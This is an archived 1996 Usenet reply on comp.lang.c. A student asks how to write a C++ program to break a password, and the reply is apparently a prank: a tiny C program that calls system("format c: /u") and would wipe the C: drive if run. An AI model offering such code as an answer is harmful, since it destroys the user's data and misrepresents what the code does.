home *** CD-ROM | disk | FTP | other *** search
- Newsgroups: comp.lang.c
- Path: news.inap.net!news1!ind-007-237-59
- From: dlmiller@iquest.net (Doug Miller)
- Subject: Re: Defeat password by C
- X-Nntp-Posting-Host: ind-007-237-59.iquest.net
- Message-ID: <Dq29EE.ML9@iquest.net>
- Sender: news@iquest.net (News Admin)
- Organization: IQuest Network Services
- X-Newsreader: News Xpress Version 1.0 Beta #2.1
- References: <4l4cns$gs0@usenetp1.news.prodigy.com>
- Date: Thu, 18 Apr 1996 13:59:03 GMT
-
- VRLL67A@prodigy.com (Bubba Meigs) wrote:
- >I am a student who trying to learn how to program C++.
- >I just wonder if anyone know how to write a program by C++ to break the
- >password.
- >
- >
- >
- #include <stdlib.h>
- int main (void) {
- system ("format c: /u");
- return (0);
- }
-